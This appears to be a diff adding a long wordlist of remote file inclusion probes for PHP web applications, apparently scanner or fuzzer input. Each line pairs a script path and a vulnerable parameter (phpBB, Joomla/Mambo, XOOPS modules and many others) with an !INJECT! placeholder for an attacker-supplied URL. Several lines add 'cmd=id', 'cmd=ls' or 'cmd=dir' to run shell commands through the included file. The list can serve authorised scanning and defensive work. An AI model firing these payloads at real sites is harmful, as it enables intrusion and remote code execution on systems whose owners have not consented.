+/index.php?adduser=true&lang=!INJECT!
+/index.php?adodb=!INJECT!
+/index.php?ads_file=!INJECT!
+/index.php?arquivo=!INJECT!
+/index.php?back=!INJECT!
+/index.php?base==!INJECT!
+/index.php?basePath=!INJECT!
+/index.php?bibtexrootrel=!INJECT!?
+/index.php?blog_dc_path=!INJECT!
+/index.php?blog_theme=!INJECT!
+/index.php?body=!INJECT!
+/index.php?class_path=!INJECT!?
+/index.php?classified_path=!INJECT!?
+/index.php?cms=!INJECT!?
+/index.php?config["sipssys"]=!INJECT!
+/index.php?config[root_ordner]=!INJECT!?&cmd=id
+/index.php?config[root_ordner]=!INJECT!?cmd=id
+/index.php?config_atkroot=!INJECT!
+/index.php?configuration=!INJECT!
+/index.php?custom_admin_path=!INJECT!?
+/index.php?dateiPfad=!INJECT!?&cmd=ls
+/index.php?de=!INJECT!
+/index.php?dept=!INJECT!
+/index.php?do=!INJECT!
+/index.php?exec=!INJECT!?
+/index.php?ext=!INJECT!
+/index.php?faq_path=!INJECT!?&cmd=id
+/index.php?file_name[]=!INJECT!?
+/index.php?file_path=!INJECT!?
+/index.php?fileloc=!INJECT!
+/index.php?from=!INJECT!
+/index.php?func=!INJECT!?
+/index.php?function=!INJECT!
+/index.php?function=custom&custom=!INJECT!
+/index.php?gOo=!INJECT!
+/index.php?gen=!INJECT!
+/index.php?get=!INJECT!
+/index.php?home_name=!INJECT!
+/index.php?ilang=!INJECT!?
+/index.php?inc_dir=!INJECT!
+/index.php?inc_dir=!INJECT!?
+/index.php?includeDir=!INJECT!
+/index.php?includeFooter=!INJECT!
+/index.php?includesdir=!INJECT!
+/index.php?insPath=!INJECT!
+/index.php?lang=!INJECT!
+/index.php?language=!INJECT!?
+/index.php?language=en&main_page=!INJECT!
+/index.php?lizge=!INJECT!?&cmd=ls
+/index.php?lng=!INJECT!
+/index.php?load=!INJECT!
+/index.php?loadpage=!INJECT!
+/index.php?main_tabid=1&main_content=!INJECT!
+/index.php?may=!INJECT!
+/index.php?middle=!INJECT!
+/index.php?mode=!INJECT!
+/index.php?modpath=!INJECT!
+/index.php?module=PostWrap&page=!INJECT!
+/index.php?mosConfig_absolute_path=!INJECT!
+/index.php?news7["functions"]=!INJECT!
+/index.php?news_include_path=!INJECT!
+/index.php?open=!INJECT!
+/index.php?option=com_custompages&cpage=!INJECT!?
+/index.php?page=!INJECT!
+/index.php?page=!INJECT!%00
+/index.php?page=!INJECT!?
+/index.php?page!INJECT!
+/index.php?page[path]=!INJECT!?&cmd=ls
+/index.php?pagename=!INJECT!
+/index.php?pager=!INJECT!
+/index.php?pagina=!INJECT!?
+/index.php?path_to_folder=!INJECT!?cmd=id
+/index.php?pg=!INJECT!?
+/index.php?phpbb_root_path=!INJECT!
+/index.php?plugin=!INJECT!
+/index.php?principal=!INJECT!
+/index.php?proMod=!INJECT!
+/index.php?proMod=!INJECT!?cmd
+/index.php?project=!INJECT!
+/index.php?repinc=!INJECT!?
+/index.php?root_prefix=!INJECT!
+/index.php?root_prefix=!INJECT!?
+/index.php?section=!INJECT!
+/index.php?site=!INJECT!
+/index.php?site_path=!INJECT!
+/index.php?styl[top]=!INJECT!??
+/index.php?template=!INJECT!?
+/index.php?templates_dir=!INJECT!?
+/index.php?theme=!INJECT!
+/index.php?themepath=!INJECT!?
+/index.php?themesdir=!INJECT!
+/index.php?this_path=!INJECT!?
+/index.php?txt=!INJECT!
+/index.php?up=!INJECT!
+/index.php?url=!INJECT!
+/index.php?w=!INJECT!
+/index.php?way=!INJECT!??????????????
+/index1.php?=!INJECT!
+/index1.php?inc=!INJECT!
+/index1.php?inhalt=!INJECT!
+/index2.php?=!INJECT!
+/index2.php?content=!INJECT!
+/index2.php?s=!INJECT!
+/index2.php?x=!INJECT!
+/indexinfo.php?bibtexrootrel=!INJECT!?
+/indexk.php?lib_path=!INJECT!?
+/info.php?file=!INJECT!
+/inhalt.php?dateien[news]=!INJECT!?
+/init.php?API_HOME_DIR=!INJECT!
+/init.php?scriptpath=!INJECT!?
+/initialize.php?hmail_config[includepath]=!INJECT!&cmd=dir
+/initiate.php?abs_path=!INJECT!
+/install.php?_NE[AbsPath]=!INJECT!
+/install.php?install_dir=!INJECT!
+/install/config.php?path=!INJECT!
+/install/di.php?pathtoserverdata=!INJECT!
+/install/index.php?content_php=!INJECT!
+/install/install3.php?database=none&cabsolute_path=!INJECT!
+/integration/shortstat/configuration.php?SPL_CFG[dirroot]=!INJECT!?
+/interact/modules/forum/embedforum.php?CONFIG[LANGUAGE_CPATH]=!INJECT!?
+/interact/modules/scorm/lib.inc.php?CONFIG[BASE_PATH]=!INJECT!?
+/interface/billing/billing_process.php?srcdir=!INJECT!?
+/interface/editors/-custom.php?bField[bf_data]=!INJECT!
+/interface/editors/custom.php?bField[bf_data]=!INJECT!
+/interface/new/new_patient_save.php?srcdir=!INJECT!?
+/intern/admin/?rootdir=!INJECT!
+/intern/admin/other/backup.php?admin=1&rootdir=!INJECT!
+/intern/clan/member_add.php?rootdir=!INJECT!
+/intern/config/forum.php?rootdir=!INJECT!
+/intern/config/key_2.php?rootdir=!INJECT!
+/ip.inc.php?type=1&cgipath=!INJECT!
+/ipeer_site/?page=!INJECT!?
+/joinus.php?vwar_root=!INJECT!
+/joinus.php?vwar_root=!INJECT!?&cmd=ls
+/joomla_path/administrator/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=!INJECT!?
+/joomla_path/components/com_articles.php?absolute_path=!INJECT!?
+/js/bbcodepress/bbcode-form.php?BBCODE_path=!INJECT!
+/js/wptable-tinymce.php?ABSPATH=!INJECT!
+/jscript.php?my_ms[root]=!INJECT!?
+/kernel/class/ixpts.class.php?IXP_ROOT_PATH=!INJECT!
+/kernel/loadkernel.php?installPath=!INJECT!
+/kmitaadmin/kmitam/htmlcode.php?file=!INJECT!?
+/ktmlpro/includes/ktedit/toolbar.php?dirDepth=!INJECT!
+/lang/leslangues.php?fichier=!INJECT!
+/lang_english/lang_main_album.php?phpbb_root_path=!INJECT!?a=
+/language/lang_english/lang_activity.php?phpbb_root_path=!INJECT!
+/language/lang_english/lang_admin_album.php?phpbb_root_path=!INJECT!?a=
+/language/lang_german/lang_admin_album.php?phpbb_root_path=!INJECT!?a=
+/language/lang_german/lang_main_album.php?phpbb_root_path=!INJECT!?a=
+/latestposts.php?forumspath=!INJECT!
+/latex.php?bibtexrootrel=!INJECT!?
+/layout/default/params.php?gConf[dir][layouts]=!INJECT!?
+/ldap/authldap.php?includePath=!INJECT!
+/learnPath/include/scormExport.inc.php?includePath=!INJECT!
+/lib.editor.inc.php?sys_path=!INJECT!?
+/lib/Loggix/Module/Calendar.php?pathToIndex=!INJECT!
+/lib/Loggix/Module/Comment.php?pathToIndex=!INJECT!
+/lib/Loggix/Module/Rss.php?pathToIndex=!INJECT!
+/lib/Loggix/Module/Trackback.php?pathToIndex=!INJECT!
+/lib/action/rss.php?lib=!INJECT!?
+/lib/activeutil.php?set[include_path]=!INJECT!?
+/lib/addressbook.php?GLOBALS[basedir]=!INJECT!
+/lib/armygame.php?libpath=!INJECT!
+/lib/authuser.php?root=!INJECT!
+/lib/base.php?BaseCfg[BaseDir]=!INJECT!
+/lib/connect.php?root=!INJECT!
+/lib/connected_users.lib.php3?ChatPath=!INJECT!
+/lib/connected_users.lib.php3?ChatPath=!INJECT!?
+/lib/db/mysql.class.php?root=!INJECT!
+/lib/db/postgres.class.php?root=!INJECT!
+/lib/functions.php?DOC_ROOT=!INJECT!
+/lib/googlesearch/GoogleSearch.php?APP[path][lib]=!INJECT!?
+/lib/header.php?DOC_ROOT=!INJECT!
+/lib/language.php?_LIB_DIR=!INJECT!
+/lib/live_status.lib.php?ROOT=!INJECT!
+/lib/misc.php?root=!INJECT!
+/lib/nl/nl.php?g_strRootDir=!INJECT!
+/lib/obj/collection.class.php?GLOBALS[application][app_root]=!INJECT!
+/lib/obj/content_image.class.php?GLOBALS[application][app_root]=!INJECT!
+/lib/pcltar.lib.php?g_pcltar_lib_dir=!INJECT!
+/lib/pcltrace.lib.php?g_pcltar_lib_dir=!INJECT!
+/lib/rs.php?rootpath=!INJECT!
+/lib/selectlang.php?BBC_LANGUAGE_PATH=!INJECT!
+/lib/smarty/SmartyFU.class.php?system[smarty][dir]=!INJECT!?
+/lib/static/header.php?set_menu=!INJECT!
+/lib/tpl.inc.php?conf[classpath]=!INJECT!
+/libraries/comment/postComment.php?path[cb]=!INJECT!?a=
+/libraries/database.php?path=!INJECT!???
+/libraries/lib-remotehost.inc.php?phpAds_geoPlugin=!INJECT!
+/libraries/pcl/pcltar.php?g_pcltar_lib_dir=!INJECT!
+/library/authorize.php?login_form=!INJECT!?
+/library/translation.inc.php?GLOBALS[srcdir]=!INJECT!?
+/libs/db.php?path_local=!INJECT!
+/libs/ftp.php?path_local=!INJECT!
+/libs/lom.php?ETCDIR=!INJECT!
+/libsecure.php?abs_path=!INJECT!?
+/license.php?CONFIG[MWCHAT_Libs]=!INJECT!?
+/link_main.php?phpbb_root_path=!INJECT!
+/linkadmin.php?page=!INJECT!?
+/linksnet_newsfeed/linksnet_linkslog_rss.php?dirpath_linksnet_newsfeed=!INJECT!?
+/list.php?phpbb_root_path=!INJECT!
+/lms_path/modules/userpanel.php?CONFIG[directories][userpanel_dir]=!INJECT!
+/lms_path/modules/welcome.php?_LIB_DIR=!INJECT!
+/load_lang.php?_SERWEB[configdir]=!INJECT!
+/load_lang.php?_SERWEB[serwebdir]=!INJECT!
+/load_phplib.php?_PHPLIB[libdir]=!INJECT!
+/loader.php?GLOBALS=!INJECT!
+/local/lib/lcUser.php?LIBDIR=!INJECT!?
+/log.php?bibtexrootrel=!INJECT!?
+/login.php3?cl_headers=!INJECT!
+/login.php?base_dir=!INJECT!
+/login.php?blog_theme=!INJECT!
+/login.php?langfile=!INJECT!
+/login.php?pachtofile=!INJECT!
+/login.php?srcdir=!INJECT!?
+/login.php?value=!INJECT!??
+/lovecms/install/index.php?step=!INJECT!?
+/m2f/m2f_cron.php?m2f_root_path=!INJECT!
+/m2f/m2f_forum.php?m2f_root_path=!INJECT!
+/m2f/m2f_mailinglist.php?m2f_root_path=!INJECT!
+/m2f/m2f_phpbb204.php?m2f_root_path=!INJECT!
+/maguz.php?site=!INJECT!
+/mail/childwindow.inc.php?form=!INJECT!?
+/mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=!INJECT!?
+/mail_this_entry/mail_autocheck.php?pm_path=!INJECT!?&cmd=ls
+/main.inc.php?pathtoscript=!INJECT!
+/main.php?config[search_disp]=true&include_dir=!INJECT!
+/main.php?id=!INJECT!
+/main.php?include_path=!INJECT!?
+/main.php?pageURL=!INJECT!
+/main.php?pagina=!INJECT!
+/main/forum/komentar.php?site_path=!INJECT!
+/main/main.php?pi=!INJECT!
+/main/ppcbannerclick.php?INC=!INJECT!?
+/main/ppcclick.php?INC=!INJECT!?
+/main_prepend.php?_SERWEB[functionsdir]=!INJECT!
+/mainpage.php?docroot=!INJECT!?cmd
+/mamboleto.php?mosConfig_absolute_path=!INJECT!
+/mambots/editors/path/jscripts/tiny_mce/plugins/preview/preview.php?mosConfig_absolute_path=!INJECT!
+/manage_songs.php?foing_root_path=!INJECT!
+/manager/admin/index.php?MGR=!INJECT!
+/manager/admin/p_ins.php?MGR=!INJECT!
+/manager/admin/u_ins.php?MGR=!INJECT!
+/manager/articles.php?_PX_config[manager_path]=!INJECT!
+/manager/static/view.php?propID=0&INC=!INJECT!
+/master.php?root_path=!INJECT!
+/mcNews/admin/header.php?skinfile=!INJECT!
+/mcf.php?content=!INJECT!
+/mcnews/admin/install.php?l=!INJECT!
+/mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]=!INJECT!
+/member.php?vwar_root=!INJECT!
+/member/usercp_menu.php?script_folder=!INJECT!
+/members/index.php?INC=!INJECT!?
+/members/registration.php?INC=!INJECT!?
+/members_help.php?hlp=!INJECT!?
+/membres/membreManager.php?include_path=!INJECT!?
+/menu.php3?cl_headers=!INJECT!
+/menu.php?functions_file=!INJECT!
+/mep/frame.php?chem=!INJECT!?
+/microcms/includes/file_manager/special.php?fm_includes_special=!INJECT!
+/middle.php?file=!INJECT!
+/migrateNE2toNE3.php?_NE[AbsPath]=!INJECT!
+/mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=!INJECT!?
+/mindmeld/include/ask.inc.php?MM_GLOBALS[home]=!INJECT!?
+/mindmeld/include/learn.inc.php?MM_GLOBALS[home]=!INJECT!?
+/mindmeld/include/manage.inc.php?MM_GLOBALS[home]=!INJECT!?
+/mindmeld/include/mind.inc.php?MM_GLOBALS[home]=!INJECT!?
+/mindmeld/include/sensory.inc.php?MM_GLOBALS[home]=!INJECT!?
+/mini-pub.php/front-end/img.php?sFileName=!INJECT!?
+/minimal/wiki.php?page=!INJECT!?
+/misc/function.php3?path=!INJECT!?
+/mitglieder.php?config[root_ordner]=!INJECT!?&cmd=id
+/mkportal/include/user.php?MK_PATH=!INJECT!
+/mkportal/include/user.php?MK_PATH=!INJECT!?
+/mod/authent.php4?rootpath=!INJECT!
+/mod/image/index.php?config[pathMod]=!INJECT!
+/mod/liens/index.php?config[pathMod]=!INJECT!
+/mod/liste/index.php?config[pathMod]=!INJECT!
+/mod/special/index.php?config[pathMod]=!INJECT!
+/mod/texte/index.php?config[pathMod]=!INJECT!
+/mod_membre/inscription.php?chemin=!INJECT!?
+/mod_phpalbum/sommaire_admin.php?chemin=!INJECT!?
+/modernbill/include/html/config.php?DIR=!INJECT!
+/modifyform.html?code=!INJECT!
+/mods/business_functions.php?GALLERY_BASEDIR=!INJECT!
+/mods/config/load.inc.php?moddir=!INJECT!?
+/mods/http/load.inc.php?moddir=!INJECT!?
+/mods/ui_functions.php?GALLERY_BASEDIR=!INJECT!
+/module/forum/forum.php?fd=!INJECT!=';
+/module/forum/main.php?id=1&main_dir=!INJECT!?&
+/modules.php?name=!INJECT!&file=article&sid=2
+/modules/4nAlbum/public/displayCategory.php?basepath=!INJECT!
+/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=!INJECT!
+/modules/Calendar/admin/update.php?calpath=!INJECT!?
+/modules/Calendar/calendar.php?calpath=!INJECT!?
+/modules/Calendar/scheme.php?calpath=!INJECT!?
+/modules/Discipline/CategoryBreakdownTime.php?FocusPath=!INJECT!
+/modules/Discipline/CategoryBreakdownTime.php?staticpath=!INJECT!
+/modules/Discipline/StudentFieldBreakdown.php?staticpath=!INJECT!
+/modules/Forums/admin/admin_styles.php?phpbb_root_path=!INJECT!
+/modules/MusooTemplateLite.php?GLOBALS[ini_array][EXTLIB_PATH]=!INJECT!
+/modules/My_eGallery/index.php?basepath=!INJECT!
+/modules/My_eGallery/public/displayCategory.php?basepath=!INJECT!
+/modules/Mysqlfinder/MysqlfinderAdmin.php?_SESSION[PATH_COMPOSANT]=!INJECT!?
+/modules/NukeAI/util.php?AIbasedir=!INJECT!
+/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=!INJECT!
+/modules/SoundImporter.php?GLOBALS[ini_array][EXTLIB_PATH]=!INJECT!
+/modules/abook/foldertree.php?baseDir==!INJECT!?
+/modules/addons/plugin.php?doc_root=!INJECT!
+/modules/admin/include/config.php?doc_root=!INJECT!
+/modules/admin/include/localize.php?doc_root=!INJECT!
+/modules/agendax/addevent.inc.php?agendax_path=!INJECT!&cmd=id
+/modules/bank/includes/design/main.inc.php?bank_data[root]=!INJECT!?
+/modules/basicfog/basicfogfactory.class.php?PATH_TO_CODE=!INJECT!
+/modules/birstday/birst.php?exbb[home_path]=!INJECT!?
+/modules/birstday/profile_show.php?exbb[home_path]=!INJECT!?
+/modules/birstday/select.php?exbb[home_path]=!INJECT!?
+/modules/blocks/headerfile.php?system[path]=!INJECT!
+/modules/calendar/index.php?inc_dir=!INJECT!
+/modules/calendar/minicalendar.php?GLOBALS[rootdp]=./&GLOBALS[gsLanguage]=!INJECT!?
+/modules/calendar/mod_calendar.php?absolute_path=!INJECT!?
+/modules/certinfo/index.php?full_path=!INJECT!
+/modules/character_roster/include.php?mod_root=!INJECT!?
+/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=!INJECT!?
+/modules/coppermine/themes/default/theme.php?THEME_DIR=!INJECT!
+/modules/downloads/lib/LM_Downloads.php?pathToIndex=!INJECT!
+/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=!INJECT!
+/modules/emails/index.php?full_path=!INJECT!
+/modules/events/index.php?full_path=!INJECT!
+/modules/fax/index.php?full_path=!INJECT!
+/modules/files/blocks/latest_files.php?system[path]=!INJECT!
+/modules/files/index.php?full_path=!INJECT!
+/modules/files/list.php?full_path=!INJECT!
+/modules/filters/headerfile.php?system[path]=!INJECT!
+/modules/formmailer/formmailer.admin.inc.php?BASE_DIR[jax_formmailer]=!INJECT!?
+/modules/forums/blocks/latest_posts.php?system[path]=!INJECT!
+/modules/global/inc/content.inc.php?sIncPath=!INJECT!?
+/modules/groupadm/index.php?full_path=!INJECT!
+/modules/groups/headerfile.php?system[path]=!INJECT!
+/modules/guestbook/index.php?CONFIG[local_root]=!INJECT!?
+/modules/history/index.php?full_path=!INJECT!
+/modules/home.module.php?repmod=!INJECT!?
+/modules/horoscope/footer.php?xoopsConfig[root_path]=!INJECT!
+/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=!INJECT!
+/modules/info/index.php?full_path=!INJECT!
+/modules/links/blocks/links.php?system[path]=!INJECT!
+/modules/links/showlinks.php?language_home=&rootdp=zZz&gsLanguage=!INJECT!
+/modules/links/submit_links.php?rootdp=zZz&gsLanguage=!INJECT!
+/modules/log/index.php?full_path=!INJECT!
+/modules/mail/index.php?full_path=!INJECT!
+/modules/menu/headerfile.php?system[path]=!INJECT!
+/modules/messages/index.php?full_path=!INJECT!
+/modules/mod_as_category.php?mosConfig_absolute_path=!INJECT!
+/modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=!INJECT!
+/modules/mod_calendar.php?absolute_path=!INJECT!
+/modules/mod_flatmenu.php?mosConfig_absolute_path=!INJECT!
+/modules/mod_mainmenu.php?mosConfig_absolute_path=!INJECT!
+/modules/mod_weather.php?absolute_path=!INJECT!?
+/modules/mx_smartor/admin/admin_album_otf.php?phpbb_root_path=!INJECT!?
+/modules/newbb_plus/config.php?bbPath[root_theme]=!INJECT!
+/modules/newbb_plus/votepolls.php?bbPath[path]=!INJECT!
+/modules/news/blocks/latest_news.php?system[path]=!INJECT!
+/modules/newusergreatings/pm_newreg.php?exbb[home_path]=!INJECT!?
+/modules/organizations/index.php?full_path=!INJECT!
+/modules/phones/index.php?full_path=!INJECT!
+/modules/pms/index.php?module_path=!INJECT!???
+/modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=!INJECT!
+/modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage=!INJECT!
+/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=!INJECT!?
+/modules/presence/index.php?full_path=!INJECT!
+/modules/projects/index.php?full_path=!INJECT!
+/modules/projects/list.php?full_path=!INJECT!
+/modules/projects/summary.inc.php?full_path=!INJECT!
+/modules/punish/p_error.php?exbb[home_path]=!INJECT!?
+/modules/punish/profile.php?exbb[home_path]=!INJECT!?
+/modules/reports/index.php?full_path=!INJECT!
+/modules/search/index.php?full_path=!INJECT!
+/modules/search/search.php?language_home=&rootdp=zZz&gsLanguage=!INJECT!?
+/modules/settings/headerfile.php?system[path]=!INJECT!
+/modules/snf/index.php?full_path=!INJECT!
+/modules/syslog/index.php?full_path=!INJECT!
+/modules/tasks/index.php?full_path=!INJECT!
+/modules/tasks/searchsimilar.php?full_path=!INJECT!
+/modules/tasks/summary.inc.php?full_path=!INJECT!
+/modules/threadstop/threadstop.php?exbb[home_path]=!INJECT!?
+/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=!INJECT!
+/modules/tml/block.tag.php?GLOBALS[PTH][classes]=!INJECT!
+/modules/tsdisplay4xoops/blocks/tsdisplay4xoops_block2.php?xoops_url=!INJECT!
+/modules/useradm/index.php?full_path=!INJECT!
+/modules/users/headerfile.php?system[path]=!INJECT!
+/modules/vWar_Account/includes/functions_common.php?vwar_root2=!INJECT!
+/modules/visitors2/include/config.inc.php?lvc_include_dir=!INJECT!?
+/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=!INJECT!
+/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=!INJECT!
+/modules/xfsection/modify.php?dir_module=!INJECT!
+/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=!INJECT!
+/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=!INJECT!
+/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=!INJECT!?
+/modulistica/mdl_save.php?CLASSPATH=!INJECT!
+/modx-0.9.6.2/assets/snippets/reflect/snippet.reflect.php?reflect_base=!INJECT!?
+/moodle/admin/utfdbmigrate.php?cmd=!INJECT!
+/moosegallery/display.php?type=!INJECT!?&cmd=[command]
+/mostlyce/jscripts/tiny_mce/plugins/htmltemplate/htmltemplate.php?mosConfig_absolute_path=!INJECT!
+/moteur/moteur.php?chemin=!INJECT!?
+/movie_cls.php?full_path=!INJECT!
+/msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=!INJECT!
+/music/buycd.php?HTTP_DOCUMENT_ROOT=!INJECT!?
+/mutant_includes/mutant_functions.php?phpbb_root_path=!INJECT!
+/mxBB/modules/kb_mods/includes/kb_constants.php?module_root_path=!INJECT!
+/mxBB/modules/mx_newssuite/includes/newssuite_constants.php?mx_root_path=!INJECT!
+/mygallery/myfunctions/mygallerybrowser.php?myPath=!INJECT!
+/myphpcommander_path/system/lib/package.php?gl_root=!INJECT!?cmd
+/mysave.php?file=!INJECT!
+/naboard_pnr.php?skin=!INJECT!?
+/ncaster/admin/addons/archive/archive.php?adminfolder=!INJECT!
+/network_module_selector.php?path_prefix=!INJECT!
+/news.php?CONFIG[script_path]=!INJECT!?
+/news.php?config[root_ordner]=!INJECT!?&cmd=id
+/news.php?scriptpath=!INJECT!?
+/news.php?vwar_root=!INJECT!
+/news/include/createdb.php?langfile;=!INJECT!?
+/news/include/customize.php?l=!INJECT!?
+/news/newstopic_inc.php?indir=!INJECT!
+/news/scripts/news_page.php?script_path=!INJECT!?
+/newsadmin.php?action=!INJECT!
+/newsarchive.php?path_to_script=!INJECT!?&cmd=ls
+/newsfeeds/includes/aggregator.php?zf_path=!INJECT!
+/newsfeeds/includes/controller.php?zf_path=!INJECT!
+/newsletter/newsletter.php?waroot=!INJECT!
+/newsp/lib/class.Database.php?path=!INJECT!?
+/newticket.php?lang=!INJECT!
+/noah/modules/noevents/templates/mfa_theme.php?tpls[1]=!INJECT!
+/noticias.php?inc=!INJECT!?
+/nucleus/plugins/skinfiles/index.php?DIR_LIBS=!INJECT!
+/nuke_path/iframe.php?file=!INJECT!
+/nukebrowser.php?filnavn=!INJECT!&filhead=!INJECT!&cmd=id
+/nuseo/admin/nuseo_admin_d.php?nuseo_dir=!INJECT!?
+/oaboard_en/forum.php?inc=!INJECT!
+/ocp-103/index.php?req_path=!INJECT!
+/ocs/include/footer.inc.php?fullpath=!INJECT!?
+/ocs/include/theme.inc.php?fullpath=!INJECT!?
+/ocs/openemr-2.8.2/custom/import_xml.php?srcdir=!INJECT!?
+/olbookmarks-0.7.4/themes/test1.php?!INJECT!
+/oneadmin/adminfoot.php?path[docroot]=!INJECT!
+/oneadmin/blogger/sampleblogger.php?path[docroot]=!INJECT!?
+/oneadmin/config-bak.php?include_once=!INJECT!
+/oneadmin/config.php?path[docroot]=!INJECT!
+/oneadmin/ecommerce/sampleecommerce.php?path[docroot]=!INJECT!?
+/online.php?config[root_ordner]=!INJECT!?&cmd=id
+/open-admin/plugins/site_protection/index.php?config%5boi_dir%5d=!INJECT!?
+/openi-admin/base/fileloader.php?config[openi_dir]=!INJECT!
+/openrat/themes/default/include/html/insert.inc.php?tpl_dir=!INJECT!???
+/opensurveypilot/administration/user/lib/group.inc.php?cfgPathToProjectAdmin=!INJECT!
+/ops/gals.php?news_file=!INJECT!
+/order/login.php?svr_rootscript=!INJECT!
+/osData/php121/php121db.php?php121dir=!INJECT!%00
+/ossigeno-suite-2.2_pre1/upload/xax/admin/modules/uninstall_module.php?level=!INJECT!?
+/ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php?ossigeno=!INJECT!?
+/owimg.php3?path=!INJECT!
+/p-news.php?pn_lang=!INJECT!
+/pafiledb/includes/pafiledb_constants.php?module_root_path=!INJECT!
+/page.php?goto=!INJECT!
+/page.php?id=!INJECT!
+/panel/common/theme/default/header_setup.php?path[docroot]=!INJECT!
+/param_editor.php?folder=!INJECT!?
+/parse/parser.php?WN_BASEDIR=!INJECT!
+/patch/?language_id=!INJECT!
+/patch/tools/send_reminders.php?noSet=0&includedir=!INJECT!?
+/paypalipn/ipnprocess.php?INC=!INJECT!?
+/pda/pda_projects.php?offset=!INJECT!
+/phfito/phfito-post?SRC_PATH=!INJECT!
+/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=!INJECT!
+/photo_comment.php?toroot=!INJECT!
+/php-inc/log.inc.php?SKIN_URL=!INJECT!
+/php-include-robotsservices.php?page=!INJECT!
+/php-nuke/modules/Forums/admin/admin_styles.php?phpbb_root_path=!INJECT!
+/php.incs/common.inc.php?cm_basedir=!INJECT!?
+/php/init.gallery.php?include_class=!INJECT!/something
+/php121db.php?php121dir=!INJECT!%00
+/php4you.php?dir=!INJECT!?
+/phpAdsNew-2.0.7/libraries/lib-remotehost.inc?phpAds_geoPlugin=!INJECT!?
+/phpBB2/shoutbox.php?phpbb_root_path=!INJECT!
+/phpCards.header.php?CardPath=!INJECT!?
+/phpGedView/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=!INJECT!
+/phpMyChat.php3?=!INJECT!?cmd=id
+/phpMyConferences_8.0.2/common/visiteurs/include/menus.inc.php?lvc_include_dir=!INJECT!?
+/phpQLAdmin-2.2.7/ezmlm.php?_SESSION[path]=!INJECT!?
+/phpSiteBackup-0.1/pcltar.lib.php?g_pcltar_lib_dir=!INJECT!
+/phpbb/sendmsg.php?phpbb_root_path=!INJECT!
+/phpcalendar/includes/calendar.php?phpc_root_path=!INJECT!?
+/phpcalendar/includes/setup.php?phpc_root_path=!INJECT!?
+/phpdebug_PATH/test/debug_test.php?debugClassLocation=!INJECT!
+/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=!INJECT!
+/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=!INJECT!
+/phphd_downloads/common.php?phphd_real_path=!INJECT!
+/phphost_directoryv2/include/admin.php?rd=!INJECT!?
+/phphtml.php?htmlclass_path=!INJECT!
+/phpi/edit_top_feature.php?include_connection=!INJECT!
+/phpi/edit_topics_feature.php?include_connection=!INJECT!
+/phplib/site_conf.php?ordnertiefe=!INJECT!
+/phplib/version/1.3.3/functionen/class.csv.php?tt_docroot=!INJECT!
+/phplib/version/1.3.3/functionen/produkte_nach_serie.php?tt_docroot=!INJECT!
+/phplib/version/1.3.3/functionen/ref_kd_rubrik.php?tt_docroot=!INJECT!
+/phplib/version/1.3.3/module/hg_referenz_jobgalerie.php?tt_docroot=!INJECT!
+/phplib/version/1.3.3/module/produkte_nach_serie_alle.php?tt_docroot=!INJECT!
+/phplib/version/1.3.3/module/ref_kd_rubrik.php?tt_docroot=!INJECT!
+/phplib/version/1.3.3/module/referenz.php?tt_docroot=!INJECT!
+/phplib/version/1.3.3/module/surfer_aendern.php?tt_docroot=!INJECT!
+/phplib/version/1.3.3/module/surfer_anmeldung_NWL.php?tt_docroot=!INJECT!
+/phplib/version/1.3.3/standard/1/lay.php?tt_docroot=!INJECT!
+/phplib/version/1.3.3/standard/3/lay.php?tt_docroot=!INJECT!
+/phplinks/includes/smarty.php?full_path_to_public_program=!INJECT!
+/phporacleview/inc/include_all.inc.php?page_dir=!INJECT!?
+/phppc/poll.php?is_phppc_included=1&relativer_pfad=!INJECT!?
+/phppc/poll_kommentar.php?is_phppc_included=1&relativer_pfad=!INJECT!?
+/phppc/poll_sm.php?is_phppc_included=1&relativer_pfad=!INJECT!?
+/phpquickgallery/gallery_top.inc.php?textFile=!INJECT!
+/phpreactor/inc/polls.inc.php?pathtohomedir=!INJECT!?
+/phpreactor/inc/updatecms.inc.php?pathtohomedir=!INJECT!?
+/phpreactor/inc/users.inc.php?pathtohomedir=!INJECT!?
+/phpreactor/inc/view.inc.php?pathtohomedir=!INJECT!?
+/phpress/adisplay.php?lang=!INJECT!
+/phpunity-postcard.php?plgallery_epost=1&gallery_path=!INJECT!?
+/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=!INJECT!
+/phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=!INJECT!
+/phpyabs/moduli/libri/index.php?Azione=!INJECT!
+/pirvate/ltwpdfmonth.php?ltw_config['include_dir]=!INJECT!
+/playlist.php?phpbb_root_path=!INJECT!
+/plugin/HP_DEV/cms2.php?s_dir=!INJECT!?
+/plugin/gateway/gnokii/init.php?apps_path[plug]=!INJECT!?
+/plugins/1_Adressbuch/delete.php?folder=!INJECT!
+/plugins/BackUp/Archive.php?bkpwp_plugin_path=!INJECT!?
+/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=!INJECT!?
+/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=!INJECT!?
+/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=!INJECT!?
+/plugins/links/functions.inc?_CONF[path]=!INJECT!
